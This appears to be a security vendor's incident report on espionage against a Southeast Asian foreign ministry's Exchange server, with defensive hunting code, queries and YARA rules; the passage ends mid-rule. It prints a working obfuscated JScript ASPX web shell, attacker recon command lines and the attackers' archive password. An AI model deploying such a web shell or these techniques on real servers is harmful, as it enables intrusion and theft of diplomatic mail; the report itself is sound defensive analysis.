Key takeaways
- Multiple threat actors are likely accessing and performing live, on-net operations against the Foreign Affairs Office of an ASEAN member through a likely vulnerable, internet-connected Microsoft Exchange server. Once access was achieved and secured, the mailboxes of targeted individuals were exported.
- Threat actors deployed a custom malware backdoor that leverages the Microsoft Graph API for command and control, which we’re naming SiestaGraph.
- A modified version of an IIS backdoor called DoorMe was leveraged with new functionality to allocate shellcode and load additional implants.
Preamble
In early December, Elastic Security Labs observed Powershell commands used to collect and export mailboxes from an internet-connected Microsoft Exchange server for the Foreign Affairs Office of an Association of Southeast Asian Nations (ASEAN) member.
Despite the diverse security instrumentation observed during this activity, the threat actors were able to:
- Execute malware on Exchange servers, domain controllers, and workstations
- Exfiltrate targeted user and group mailboxes
- Deploy web shells
- Move laterally to user workstations
- Perform internal reconnaissance
- Collect Windows credentials
Because the intrusion is ongoing and covers almost the entire MITRE ATT&CK framework, the analysis sections will use a timeline approach.
For a deep-dive analysis of the SIESTAGRAPH, DOORME, and SHADOWPAD malware families, see our follow-on publication that covers them in detail. There are also associations between this campaign and others, based on our own observations and third-party reporting.
Updated: 2/2/2023
Analysis
The investigation, which we're tracking as REF2924, began with the execution of a PowerShell command used to export a user mailbox. While this is a normal administrative function, the command ran with a process ancestry starting at the IIS worker process (w3wp.exe) as the parent of cmd.exe, with cmd.exe in turn executing PowerShell.
These events started the investigation that later identified multiple threat actors within the contested network environment.
The first event observed in this activity cluster was the detection of a malicious file executing on a domain controller on November 26, 2022. Because that detection is the earliest event we have, Elastic Defend was most likely deployed after the initial compromise, and it was running in "Detect" mode. During the analysis we also observed other security instrumentation in the environment, indicating that the victim was aware of the intrusion and was attempting to evict the threat actors.
Because of the multiple malware samples achieving similar goals, various DLL sideloading observations, and the presence of a likely internet-connected Exchange server; we believe that there are multiple threat actors or threat groups working independently or in tandem with each other.
November 26-30, 2022
Malware execution
The first known evidence of compromise occurred on November 26, 2022, with the execution of a file named OfficeClient.exe from **C:\ProgramData\Microsoft** on a domain controller.
Ten minutes after OfficeClient.exe executed on the domain controller, another malicious file executed on a different Windows 2019 server. This file was named Officeclient.exe and ran from **c:\windows\pla**. On November 28, 2022, officeup.exe was executed from **C:\programdata** on the same Windows 2019 server.
On November 29, 2022, the OfficeClient.exe file was executed on the Exchange server as C:\ProgramData\OfficeCore.exe.
All three of these files ( OfficeClient.exe , Officeclient.exe , and OfficeCore.exe ) have an original PE file name of windowss.exe , which is the file name assigned at compile time. We are naming this malware family “SiestaGraph” because of the long sleep timer and the way that the malware uses the Microsoft Graph API for command and control.
As of December 8, 2022, we observed a variant of SiestaGraph in VirusTotal, uploaded from the Netherlands on October 14, 2022. SiestaGraph uses a .NET API library to interact with Microsoft Graph, the API for Microsoft cloud services including Microsoft 365, Windows, and Enterprise Mobility + Security.
Internal reconnaissance
On November 28, 2022, the threat actors began internal reconnaissance by running standard commands such as whoami, hostname, and tasklist. These commands ran with a process ancestry starting at the IIS worker process (w3wp.exe) as the parent of cmd.exe, with cmd.exe executing the commands.

```
cmd.exe /c cd /d "C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\themes\resources"&whoami
cmd.exe /c cd /d "C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\themes\resources"&hostname
cmd.exe /c cd /d "C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\themes\resources"&tasklist
```
Additional adversary reconnaissance was performed to enumerate local network assets as well as victim assets at embassies and consulates abroad. There has been no indication that this information has been subsequently exploited for additional access or information at this time.
On November 29, 2022, the threat actors began collecting domain user and group information with net user and net group commands, again executed as child processes of w3wp.exe and cmd.exe. These commands confirmed that this was not a fully scripted campaign and that an active operator was involved: in two of the 20 net user commands the operator forgot to add the /domain switch. The /domain switch is not required for net user, but the fact that it was omitted in only two of 20 invocations is most likely an operator mistake. This was the first of several typos observed in this campaign.
Exporting Exchange mailboxes
On November 28, 2022, the threat actors began exporting user mailboxes, again with the w3wp.exe process as the parent of cmd.exe and finally PowerShell. The threat actors added the Microsoft.Exchange.Management.PowerShell.SnapIn module, which provides the ability to manage Exchange functions from PowerShell, and used it to export the mailboxes of targeted foreign service personnel and save them as PST files.
In the example above, the Received -gt and Sent -gt dates ("gt" being short for "greater than") set the collection window to all email received or sent after November 15, 2022. The timebox was not uniform across all mailboxes, and the process was repeated several times. In the example above, on November 28, 2022 the timebox covered all email sent or received from November 15, 2022 through the current date (November 28, 2022); on December 6, 2022 the same mailbox was exported again, this time with a gt value of November 28, 2022, the date of the previous export.
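As an added example (not code from the original report), the following Python models the two checks that the "Exporting Exchange Mailbox via PowerShell" and "Suspicious Microsoft IIS Worker Descendant" rules combine: it walks the process ancestry of every New-MailboxExportRequest back to see whether it descends from w3wp.exe, and it pulls the Received/Sent -gt dates out of the ContentFilter to reconstruct the collection window. The events, mailbox names, and file paths are constructed for this example and do not reproduce the exact commands seen in the intrusion.

```python
"""Hunt for Exchange mailbox exports launched from an IIS worker process.

Added example, not code from the Elastic report. EVENTS is a constructed,
simplified ECS-like sample; command lines, mailbox names and paths are
illustrative.
"""
import re
from datetime import datetime

EVENTS = [
    # Chain 1: IIS worker -> cmd.exe -> powershell.exe exporting a mailbox (suspicious ancestry)
    {"pid": 100, "ppid": 4, "name": "w3wp.exe",
     "command_line": 'w3wp.exe -ap "MSExchangeOWAAppPool"'},
    {"pid": 200, "ppid": 100, "name": "cmd.exe",
     "command_line": "cmd.exe /c powershell -c ..."},
    {"pid": 300, "ppid": 200, "name": "powershell.exe",
     "command_line": ("powershell.exe -c Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; "
                      "New-MailboxExportRequest -Mailbox user1 "
                      "-ContentFilter {(Received -gt '11/15/2022') -or (Sent -gt '11/15/2022')} "
                      "-FilePath \\\\localhost\\c$\\ProgramData\\1.pst")},
    # Chain 2: an administrator exporting from an interactive shell (benign ancestry)
    {"pid": 400, "ppid": 1, "name": "explorer.exe", "command_line": "explorer.exe"},
    {"pid": 500, "ppid": 400, "name": "powershell.exe",
     "command_line": ("powershell.exe New-MailboxExportRequest -Mailbox helpdesk "
                      "-ContentFilter {(Received -gt '09/01/2022')} "
                      "-FilePath \\\\backup\\pst\\helpdesk.pst")},
]

EXPORT_CMDLET = re.compile(r"New-MailboxExportRequest", re.I)
MAILBOX_ARG = re.compile(r"-Mailbox\s+['\"]?([^\s'\"]+)", re.I)
# Each "Received -gt '<date>'" / "Sent -gt '<date>'" term inside a -ContentFilter block
FILTER_TERM = re.compile(r"\b(Received|Sent)\s+-gt\s+'([^']+)'", re.I)
IIS_WORKER = "w3wp.exe"


def ancestry(by_pid, pid, max_depth=32):
    """Walk ppid links upward and return parent process names, nearest parent first."""
    chain, seen = [], set()
    ev = by_pid.get(pid)
    while ev is not None and ev["ppid"] not in seen and len(chain) < max_depth:
        seen.add(ev["ppid"])  # guard against cyclic or recycled PIDs
        parent = by_pid.get(ev["ppid"])
        if parent is None:
            break
        chain.append(parent["name"].lower())
        ev = parent
    return chain


def parse_content_filter(command_line):
    """Return {'Received': 'YYYY-MM-DD', 'Sent': 'YYYY-MM-DD'} for the -gt dates present."""
    window = {}
    for field, raw in FILTER_TERM.findall(command_line):
        window[field.capitalize()] = datetime.strptime(raw, "%m/%d/%Y").date().isoformat()
    return window


def find_mailbox_exports(events):
    """One finding per New-MailboxExportRequest, flagging exports that descend from w3wp.exe."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for ev in events:
        cmd = ev["command_line"]
        if not EXPORT_CMDLET.search(cmd):
            continue
        mailbox = MAILBOX_ARG.search(cmd)
        chain = ancestry(by_pid, ev["pid"])
        findings.append({
            "pid": ev["pid"],
            "mailbox": mailbox.group(1) if mailbox else None,
            "ancestry": chain,
            "from_iis": IIS_WORKER in chain,
            "window": parse_content_filter(cmd),
        })
    return findings


if __name__ == "__main__":
    for finding in find_mailbox_exports(EVENTS):
        print(finding)
```

The ancestry walk is what separates the two findings: both are legitimate cmdlet usage on their face, but only an export whose chain reaches back to the IIS worker process indicates a web shell or IIS module driving it. The reconstructed window is what lets an analyst build the collection table shown later in this post.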
In another example in this phase, the threat actors targeted a mailbox called csirt. While this is unconfirmed, “csirt” is commonly an acronym for Cyber Security Incident Response Team.
Taking into consideration the timebox used on the csirt export, if this is the industry standard acronym of CSIRT, the intrusion could have started as early as September 1, 2022, and the threat actors were monitoring the CSIRT to identify if their intrusion had been detected.
Throughout this phase, a total of 24 mailboxes were exported.
Once the mailboxes were exported, the threat actor created a 7zip archive called 7.tmp with a password of huebfkaudfbaksidfabsdf.
Three of the mailboxes, one of which being the csirt mailbox, were archived individually. These three mailboxes were archived with a .log.rar or .log file extension.
Finally, the threat actor created a 200m 7zip archive called o.7z and added the previously created, password-protected, 7.tmp archive to it.
IIS backdoor module
On November 28, 2022, we observed two DLL files, Microsoft.Exchange.Entities.Content.dll and iisrehv.dll, being loaded through execution of the iissvcs service under svchost.exe. Both DLLs were loaded by the Windows Service Host via the command line C:\Windows\system32\svchost.exe -k iissvcs. These malicious IIS modules are loosely based on the DoorMe IIS backdoor.
For context, IIS is web server software developed by Microsoft and used within the Windows ecosystem to host websites and server-side applications. Starting with version 7.0, Microsoft extended IIS with a modular architecture that allows individual modules to be added or removed to provide the functionality an environment needs. These modules represent individual features the server can use to process incoming requests.
During the post-compromise stage, the adversary used the malicious IIS module as a passive backdoor that monitors all incoming HTTP requests. When a request crafted by the operator arrives, the malware activates and processes the embedded commands. This approach is challenging for organizations because there is usually low visibility into these endpoints and a lack of prevention capabilities on them. Installing the backdoor requires administrator rights and requires the module to be placed inside the %windir%\System32\inetsrv directory. Based on the observed artifacts, we believe initial access was gained through server exploitation during a recent wave of Microsoft Exchange RCE exploit usage.
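Because a native IIS module is registered in applicationHost.config and, as noted above, sits alongside the stock modules in inetsrv, a path-based check alone will not surface it; comparing the registered module list against a known-good baseline will. The following Python is an added example (not code from the original report) that diffs the globalModules section of two applicationHost.config files. Both XML fragments are constructed: the stock module names are real IIS modules, the module name registered for iisrehv.dll is a hypothetical placeholder, and the second variant, a stock module name whose image has been swapped, is also hypothetical.

```python
"""Diff the native module list of an IIS applicationHost.config against a baseline.

Added example, not code from the Elastic report. Both XML fragments are
constructed; "ExchangeContentModule" is a hypothetical registration name and
the swapped image under StaticCompressionModule is a hypothetical variant.
"""
import xml.etree.ElementTree as ET

BASELINE_XML = r"""<configuration>
  <system.webServer>
    <globalModules>
      <add name="HttpLoggingModule" image="%windir%\System32\inetsrv\loghttp.dll" />
      <add name="StaticCompressionModule" image="%windir%\System32\inetsrv\compstat.dll" />
      <add name="RequestFilteringModule" image="%windir%\System32\inetsrv\modrqflt.dll" />
    </globalModules>
  </system.webServer>
</configuration>"""

CURRENT_XML = r"""<configuration>
  <system.webServer>
    <globalModules>
      <add name="HttpLoggingModule" image="%windir%\System32\inetsrv\loghttp.dll" />
      <add name="StaticCompressionModule" image="%windir%\System32\inetsrv\Microsoft.Exchange.Entities.Content.dll" />
      <add name="RequestFilteringModule" image="%windir%\System32\inetsrv\modrqflt.dll" />
      <add name="ExchangeContentModule" image="%windir%\System32\inetsrv\iisrehv.dll" />
    </globalModules>
  </system.webServer>
</configuration>"""


def load_global_modules(xml_text):
    """Return {module name: image path (lower-cased)} for every <add> under <globalModules>."""
    root = ET.fromstring(xml_text)
    modules = {}
    # iterate by tag so the dotted <system.webServer> parent needs no XPath handling
    for section in root.iter("globalModules"):
        for add in section.findall("add"):
            modules[add.get("name")] = add.get("image", "").lower()
    return modules


def diff_modules(baseline, current):
    """Modules registered since the baseline, modules whose image was swapped, and removals."""
    added = {name: img for name, img in current.items() if name not in baseline}
    modified = {name: (baseline[name], img) for name, img in current.items()
                if name in baseline and baseline[name] != img}
    removed = sorted(name for name in baseline if name not in current)
    return {"added": added, "modified": modified, "removed": removed}


def audit(baseline_xml, current_xml):
    """Parse both configs and return the module diff."""
    return diff_modules(load_global_modules(baseline_xml), load_global_modules(current_xml))


if __name__ == "__main__":
    result = audit(BASELINE_XML, CURRENT_XML)
    for name, image in result["added"].items():
        print(f"ADDED     {name}: {image}")
    for name, (old, new) in result["modified"].items():
        print(f"MODIFIED  {name}: {old} -> {new}")
    for name in result["removed"]:
        print(f"REMOVED   {name}")
```

Take the baseline from a freshly built server of the same Exchange and IIS version, run the audit against %windir%\System32\inetsrv\config\applicationHost.config on the suspect host, and then hash and signature-check every image the diff reports, since a swapped image under a stock module name is the variant a name-only allowlist would miss.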
The malicious module (C++ DLL) is first loaded through its export, RegisterModule. This function is responsible for setting up the event handler methods and dynamically resolving API libraries for future usage. The main functionality of the backdoor is implemented using the CGlobalModule class under the event handler OnGlobalPreBeginRequest. By overriding this event handler, the malware is loaded before a request enters the pipeline. The core functionality of the backdoor all exists in this function, including cookie validation, parsing commands, and calling underlying command functions.
The malware implements an authentication mechanism based on a specific cookie name that contains the authentication key. The malicious IIS module checks every incoming HTTP request for that cookie name and, for a GET request, returns a success message. The operator uses the GET request to test the backdoor's status; it also returns the username and hostname of the impacted machine. Commands are passed to the backdoor as the body of POST requests.
Throughout our analysis, we discovered old samples on VirusTotal relating to this backdoor. Although they have the same authentication and logic, they implement different functionalities. The cookie name used for authentication was also changed alongside the handled commands.
The observed backdoor implements four commands; the pipe symbol (|) separates the command ID from its arguments.
| ID | Parameter | Description |
|---|---|---|
| 0x42 | Expects the string GenBeaconOptions | Generates a unique Globally Unique Identifier used to identify the infected machine and sends it to the attacker |
| 0x43 | Shellcode blob | Executes the shellcode blob passed as a parameter in the current process |
| 0x44 | N/A | Writes to and reads from a specified named pipe |
| 0x63 | Shellcode blob in chunks | Similar to command ID 0x43, but receives the shellcode blob in chunks and executes it once fully received |
From our analysis, it appears that this simplistic backdoor is used as a stage loader. It uses NT Windows APIs, mainly NtAllocateVirtualMemory , NtProtectVirtualMemory , and NtCreateThreadEx , to allocate the required shellcode memory and to create the executing thread.
kk2.exe
On November 30, 2022, an unknown binary named kk2.exe was executed on the Exchange server. As of this writing we have not been able to collect kk2.exe, but we know it was used to load mhyprot.sys, a vulnerable driver that can be used to monitor and terminate processes from kernel mode. It is unclear whether mhyprot.sys was downloaded by kk2.exe or embedded in it.
mhyprot.sys was detected by Elastic's publicly released Windows.VulnDriver.Mhyprot YARA rule, published in August 2022.
For more information on how vulnerable drivers are used for intrusions, check out the Stopping Vulnerable Driver Attacks research Joe Desimone published in September 2022.
As stated previously, we could not collect kk2.exe for analysis but it is likely that it used mhyprot.sys to escalate to kernel mode as a way to monitor, and if necessary, terminate processes. This could be used as a way of protecting an implant, or entire intrusion, from detection.
Web shells
The following section highlights multiple attempts by the threat actors to install a web shell as a backdoor into the environment in case they are evicted. While this is speculative, it appears that most of these attempts to load web shells failed, and it is unclear why. We will not cover every attempt, as several were very similar, but we will highlight the shifts in approach.
The first attempt was to use the Microsoft certutil tool to download an Active Server Pages (ASPX) file ( config.aspx ) from a remote host (185.239.70[.]229) and save it as the error.aspx page on the Exchange Control Panel’s webserver. Because this IP address is a known Cobalt Strike server, it may have been blocked by network defense architecture, leading to further attempts to overwrite error.aspx.
After attempting to use config.aspx from a Cobalt Strike C2 server, the threat actors attempted to write Base64-encoded JScript into a text file (1.txt), use certutil to decode it into 2.aspx, and then overwrite error.aspx with 2.aspx. This was attempted on both the Exchange Control Panel and Outlook Web Access web servers.
The Base64-encoded string decoded into the following JScript:

```aspx
<%@ Page Language="Jscript" Debug=true%>
<%
var TNKY='nHsXLMPUSCABolxOgKWuIFeGVimhEjyzQrTvRcwafZdJDktqYpbN';
var ZZXG=Request.Form("daad");
var VAXN=TNKY(7) + TNKY(0) + TNKY(2) + TNKY(10) + TNKY(21) + TNKY(22);
eval(ZZXG, VAXN);
%>
```

The preceding code is a simple web shell that uses the eval method to evaluate JScript code sent through the POST parameter daad. The six characters indexed out of TNKY assemble "UnsAFe", a case variant of "unsafe", the second eval argument JScript.NET accepts to run the evaluated code in unsafe mode. Variations of this technique were attempted multiple times. Other attempts were observed to load obfuscated versions of the China Chopper and Godzilla web shells.
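As an added example (not code from the original report), the Python below replays the certutil -decode step on a Base64 copy of the shell above and then triages the result the way a web shell hunt over .aspx files would: it resolves the character-index chain (TNKY(7) + TNKY(0) + ...) to the literal it hides and flags eval of request-supplied input. The Base64 input is constructed from the shell shown above and stands in for the attacker's 1.txt; the indicator names are this example's own.

```python
"""Decode and triage a JScript ASPX web shell.

Added example, not code from the Elastic report. ENCODED_1_TXT is a
constructed Base64 copy of the shell shown in the post, standing in for
the attacker's 1.txt; the indicator names are this example's own.
"""
import base64
import re

SHELL_SOURCE = r"""<%@ Page Language="Jscript" Debug=true%>
<%
var TNKY='nHsXLMPUSCABolxOgKWuIFeGVimhEjyzQrTvRcwafZdJDktqYpbN';
var ZZXG=Request.Form("daad");
var VAXN=TNKY(7) + TNKY(0) + TNKY(2) + TNKY(10) + TNKY(21) + TNKY(22);
eval(ZZXG, VAXN);
%>"""
ENCODED_1_TXT = base64.b64encode(SHELL_SOURCE.encode()).decode()  # constructed input

LITERAL_ASSIGN = re.compile(r"var\s+(\w+)\s*=\s*(['\"])(.*?)\2\s*;")   # var X='literal';
ASSIGN = re.compile(r"var\s+(\w+)\s*=\s*([^;]+);")                     # var X=<expr>;
INDEX_REF = re.compile(r"\b(\w+)\s*[\(\[]\s*(\d+)\s*[\)\]]")           # X(7) or X[7]
TAINT_SOURCE = re.compile(r"\bRequest\s*[\.\(\[]")                      # Request.Form(...) etc.
EVAL_CALL = re.compile(r"\beval\s*\(\s*([^,\)]+)")                      # first eval argument
JSCRIPT_PAGE = re.compile(r"<%@\s*Page\b[^%]*Language\s*=\s*[\"']?Jscript", re.I)


def certutil_decode(text):
    """Mimic `certutil -decode`: drop PEM-style header/footer lines and whitespace, then Base64-decode."""
    body = "".join(line.strip() for line in text.splitlines() if not line.startswith("-----"))
    return base64.b64decode(body).decode("utf-8")


def resolve_index_chains(src):
    """Rebuild strings assembled from single-character indexes into a string literal."""
    literals = {name: value for name, _quote, value in LITERAL_ASSIGN.findall(src)}
    resolved = {}
    for name, expr in ASSIGN.findall(src):
        refs = INDEX_REF.findall(expr)
        parts = [p.strip() for p in expr.split("+")]
        # only accept expressions made entirely of index references into known literals
        if refs and len(refs) == len(parts) and all(ref in literals for ref, _ in refs):
            try:
                resolved[name] = "".join(literals[ref][int(i)] for ref, i in refs)
            except IndexError:
                continue
    return resolved


def scan_webshell(src):
    """Return the list of web shell indicators found in an ASPX source."""
    indicators = []
    if JSCRIPT_PAGE.search(src):
        indicators.append("jscript_page_directive")
    tainted = {name for name, expr in ASSIGN.findall(src) if TAINT_SOURCE.search(expr)}
    for arg in EVAL_CALL.findall(src):
        if arg.strip() in tainted or TAINT_SOURCE.search(arg):
            indicators.append("eval_of_request_input")
            break
    strings = {v.lower() for _n, _q, v in LITERAL_ASSIGN.findall(src)}
    strings |= {v.lower() for v in resolve_index_chains(src).values()}
    if "unsafe" in strings:
        indicators.append("unsafe_eval_mode")
    return indicators


if __name__ == "__main__":
    decoded = certutil_decode(ENCODED_1_TXT)
    print(resolve_index_chains(decoded))
    print(scan_webshell(decoded))
```

Resolving the index chain is the step that defeats this particular obfuscation: a signature on the literal "unsafe" never fires because the string is only ever assembled at runtime, but the chain itself is static and can be evaluated offline.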
December 1–4, 2022
DLL side-loading
On December 2, 2022, on two domain controllers, we observed a new DLL (log.dll) being side-loaded by a legitimate but 11-year-old version of the Bitdefender Crash Handler executable (compiled name BDReinit.exe), present on disk as 13802 AR.exe. Once executed, it moves to the **C:\ProgramData\OfficeDriver** directory, renames itself **svchost.exe**, and installs itself as a service.
Once log.dll is loaded, it spawns Windows Media Player (wmplayer.exe) and dllhost.exe and injects into them, which triggers a memory shellcode detection.
Updated 2/2/2023: In our updated research into SIESTAGRAPH, DOORME, and SHADOWPAD, we identify log.dll as part of the SHADOWPAD malware family.
On December 2, 2022, another unknown DLL, Loader.any , was interactively executed with an Administrative account using rundll32.exe. Loader.any was observed executing two times on a Domain Controller and was then deleted interactively.
On December 3, 2022, we observed another malicious file, APerfectDayBase.dll. While this is a known malicious file, the execution was not observed. APerfectDayBase.dll is the legitimate name of a DLL in the import table of a benign-looking program, AlarmClock.exe.
This naming appears to be an attempt to make the malicious DLL look legitimate and to use AlarmClock.exe as a side-loading target. Testing has confirmed that the DLL can be side-loaded by AlarmClock.exe. While AlarmClock.exe is not malicious, we are including its hash in the Indicators table because its presence may serve purely as a side-loading vehicle for the malicious DLL, APerfectDayBase.dll.
Victimology and targeting motivations
Diamond Model
Elastic Security uses the Diamond Model to describe the high-level relationships between the adversaries, capabilities, infrastructure, and victims of intrusions. While the Diamond Model is most commonly used for single incidents, with Activity Threading (section 8) as a way to create relationships between incidents, an adversary-centered approach (section 7.1.4) allows for a single, if cluttered, diamond.
Victimology
The victim is the foreign ministry of a nation in Southeast Asia. The threat actor appeared to focus priority intelligence collection efforts on personnel and positions of authority related to the victim's relationship with ASEAN (Association of Southeast Asian Nations).
ASEAN is a regional partnership union founded in 1967 to promote intergovernmental cooperation among member states. This has been expressed through economic, security, trade, and educational cooperation with expanding international and domestic significance for partner nations. The union itself has expanded to 10 member countries with 2 more currently seeking accession. It is exerting this international influence over the development of a Regional Comprehensive Economic Partnership trade agreement with a broader periphery of member nations (16 members and 2 applicants).
Below is a list of the targeted users, the collection window(s) in which their mailboxes were exported, and the date their mailboxes were exported.
| User | Collection Window | Collection Date(s) |
|---|---|---|
| User 1 | 11/1/2022 - 11/28/2022; 11/29/2022 - 12/6/2022 | 11/28/2022; 12/6/2022 |
| User 2 | 11/1/2022 - 11/28/2022 | 11/28/2022 |
| User 3 | 11/1/2022 - 11/28/2022 | 11/28/2022 |
| User 4 | 11/15/2022 - 11/28/2022 | 11/28/2022 |
| User 5 | 11/15/2022 - 11/28/2022; 11/29/2022 - 12/6/2022 | 11/28/2022; 12/6/2022 |
| User 6 | 11/15/2022 - 11/28/2022 | 11/28/2022 |
| User 7 | 11/15/2022 - 11/28/2022; 11/29/2022 - 12/6/2022 | 11/28/2022; 12/6/2022 |
| User 8 | 11/15/2022 - 11/28/2022 | 11/28/2022 |
| User 9 | 11/15/2022 - 11/28/2022 | 11/28/2022 |
| User 10 | 9/15/2022 - 11/29/2022 | 11/29/2022 |
| User 11 | 9/15/2022 - 11/29/2022 | 11/29/2022 |
| User 12 | 9/15/2022 - 11/29/2022 | 11/29/2022 |
| User 13 | 9/1/2022 - 11/30/2022 | 11/30/2022 |
| User 14 | 9/1/2022 - 11/30/2022 | 11/30/2022 |
| User 15 | 11/29/2022 - 12/6/2022 | 12/6/2022 |
| User 16 | 11/29/2022 - 12/6/2022 | 12/6/2022 |
| User 17 | 11/29/2022 - 12/6/2022 | 12/6/2022 |
| User 18 | 11/29/2022 - 12/6/2022 | 12/6/2022 |
| User 19 | 11/29/2022 - 12/6/2022 | 12/6/2022 |
| User 20 | 11/29/2022 - 12/6/2022 | 12/6/2022 |
| User 21 | 11/29/2022 - 12/6/2022 | 12/6/2022 |
| User 22 | 11/29/2022 - 12/6/2022 | 12/6/2022 |
| User 23 | 11/29/2022 - 12/6/2022 | 12/6/2022 |
| User 24 | 11/29/2022 - 12/6/2022 | 12/6/2022 |
As reflected above, Users 1, 5, and 7 were targeted twice each, indicating that the contents of their mailboxes were of particular interest. This could be the result of pre-intrusion reconnaissance, or the threat actor may have decided to continue collecting on those users after reviewing the initial tranche of mailboxes.
Targeting motivation
There is no indication this victim would provide any direct monetary benefit to an adversary. The attack appears to be motivated by the purpose of diplomatic intelligence gathering. There are a number of potential adversaries who would find a nation’s confidential diplomatic communications related to ASEAN, and by extension the RCEP, to be highly advantageous in furthering their own regional influence, national security, and domestic goals.
If the threat actor is excluded from ASEAN trade unions and depends on foreign aid from members of those trade unions, it could find confidential diplomatic information specifically related to ASEAN useful for negotiating or renegotiating trade agreements.
ASEAN member nations are rival claimants to territorial disputes in the South China Sea (SCS). ASEAN as an organization has not produced a unified front in the SCS dispute, with some members preferring direct nation-to-nation negotiations and some wanting ASEAN to negotiate as a whole. Diplomatic information from ASEAN member nations might provide the threat actor with useful information to influence decisions and negotiations around the SCS. The threat actor's interest in ASEAN and any individual member would almost certainly be multifaceted covering government functions from immigration to agriculture, to technology, to sociopolitical considerations such as human rights.
Detection logic
Prevention rules
Detection rules
- Potential Credential Access via DCSync
- Windows Service Installed via an Unusual Client
- Suspicious Microsoft IIS Worker Descendant
- Encrypting Files with WinRar or 7z
- Exporting Exchange Mailbox via PowerShell
- Windows Network Enumeration
- NTDS or SAM Database File Copied
- Suspicious CertUtil Commands
Hunting queries
Events for both KQL and EQL are provided by the Elastic Agent using the Elastic Defend integration. Hunting queries may return high-signal results or false positives; they are used to identify potentially suspicious behavior, but investigation is required to validate the results.
KQL query
Using the Discover app in Kibana, the query below identifies loaded IIS modules that Elastic Defend has identified as malicious (even when Elastic Defend is in "Detect Only" mode).
The leading and trailing wildcards (*) can make this an expensive search over a large number of events.

```kql
event.code : "malicious_file" and event.action : "load" and process.name : "w3wp.exe" and process.command_line.wildcard : (*MSExchange* or *SharePoint*)
```
EQL queries
Using the Timeline section of the Security Solution in Kibana under the "Correlation" tab, you can use the EQL queries below to hunt for behaviors similar to the SiestaGraph backdoor and the observed DLL side-loading patterns.

Hunt for DLL side-loading using the observed DLLs:

```eql
library where
  dll.code_signature.exists == false and
  process.code_signature.trusted == true and
  dll.name : ("log.dll", "APerfectDayBase.dll") and
  process.executable :
    ("?:\\Windows\\Tasks\\*",
     "?:\\Users\\*",
     "?:\\ProgramData\\*")
```

Hunt for a scheduled task or service started from a suspicious path:

```eql
process where event.type == "start" and
  process.executable : ("?:\\Windows\\Tasks\\*", "?:\\Users\\Public\\*", "?:\\ProgramData\\Microsoft\\*") and
  (process.parent.args : "Schedule" or process.parent.name : "services.exe")
```

Hunt for the SiestaGraph compiled file name running as a scheduled task:

```eql
process where event.type == "start" and
  process.pe.original_file_name : "windowss.exe" and not process.name : "windowss.exe" and process.parent.args : "Schedule"
```

Hunt for an unsigned executable using the Microsoft Graph API:

```eql
network where event.action == "lookup_result" and
  dns.question.name : "graph.microsoft.com" and process.code_signature.exists == false
```
YARA
Elastic Security has created YARA rules to identify this activity. Below are the YARA rules for the SiestaGraph malware implant and the DoorMe IIS backdoor.

```yara
rule Windows_Trojan_DoorMe {
    meta:
        author = "Elastic Security"
        creation_date = "2022-12-09"
        last_modified = "2022-12-15"
        os = "Windows"
        arch = "x86"
        category_type = "Trojan"
        family = "DoorMe"
        threat_name = "Windows.Trojan.DoorMe"
        reference_sample = "96b226e1dcfb8ea2155c2fa508125472c8c767569d009a881ab4c39453e4fe7f"
    strings:
        $seq_aes_crypto = { 8B 6C 24 ?? C1 E5 ?? 8B 5C 24 ?? 8D 34 9D ?? ?? ?? ?? 0F B6 04 31 32 44 24 ?? 88 04 29 8D 04 9D ?? ?? ?? ?? 0F B6 04 01 32 44 24 ?? 88 44 29 ?? 8D 04 9D ?? ?? ?? ?? 0F B6 04 01 44 30 F8 88 44 29 ?? 8D 04 9D ?? ?? ?? ?? 0F B6 04 01 44 30 E0 88 44 29 ?? 8B 74 24 ?? }
        $seq_copy_str = { 48 8B 44 24 ?? 48 89 58 ?? 48 89 F1 4C 89 F2 49 89 D8 E8 ?? ?? ?? ?? C6 04 1E ?? }
        $seq_md5 = { 89 F8 44 21 C8 44 89 C9 F7 D1 21 F1 44 01 C0 01 C8 44 8B AC 24 ?? ?? ?? ?? 8B 9C 24 ?? ?? ?? ?? 48 89 B4 24 ?? ?? ?? ?? 44 89 44 24 ?? 46 8D 04 28 41 81 C0 ?? ?? ?? ?? 4C 89 AC 24 ?? ?? ?? ?? 41 C1 C0 ?? 45 01 C8 44 89 C1 44 21 C9 44 89 C2 F7 D2 21 FA 48 89 BC 24 ?? ?? ?? ?? 8D 2C 1E 49 89 DC 01 D5 01 E9 81 C1 ?? ?? ?? ?? C1 C1 ?? 44 01 C1 89 CA 44 21 C2 89 CD F7 D5 44 21 CD 8B 84 24 ?? ?? ?? ?? 48 89 44 24 ?? 8D 1C 07 01 EB 01 DA 81 C2 ?? ?? ?? ?? C1 C2 ?? }
        $seq_calc_key = { 31 FF 48 8D 1D ?? ?? ?? ?? 48 83 FF ?? 4C 89 F8 77 ?? 41 0F B6 34 3E 48 89 F1 48 C1 E9 ?? 44 0F B6 04 19 BA ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 83 E6 ?? 44 0F B6 04 1E BA ?? ?? ?? ?? 48 8B 4D ?? E8 ?? ?? ?? ?? 48 83 C7 ?? }
        $seq_base64 = { 8A 45 ?? 8A 4D ?? C0 E0 ?? 89 CA C0 EA ?? 80 E2 ?? 08 C2 88 55 ?? C0 E1 ?? 8A 45 ?? C0 E8 ?? 24 ?? 08 C8 88 45 ?? 41 83 C4 ?? 31 F6 44 39 E6 7D ?? 66 90 }
        $str_0 = ".?AVDoorme@@" ascii fullword
    condition:
        3 of ($seq*) or 1 of ($str*)
}
```

```yara
rule Windows_Trojan_SiestaGraph {
    meta:
        author = "Elastic Security"
        creation_date = "2022-12-14"
        last_modified = "2022-12-15"
        os = "Windows"
        arch = "x86"
        category_type = "Trojan"
        family = "SiestaGraph"
        threat_name = "Windows.Trojan.SiestaGraph"
        reference_sample = "50c2f1bb99d742d8ae0ad7c049362b0e62d2d219b610dcf25ba50c303ccfef54"
    strings:
        $a1 = "downloadAsync" ascii nocase fullword
        $a2 = "UploadxAsync" ascii nocase fullword
        $a3 = "GetAllDriveRootChildren" ascii fullword
        $a4 = "GetDriveRoot" ascii fullword
        $a5 = "sendsession" wide fullword
        $b1 = "ListDrives" wide fullword
        $b2 = "Del OK" wide fullword
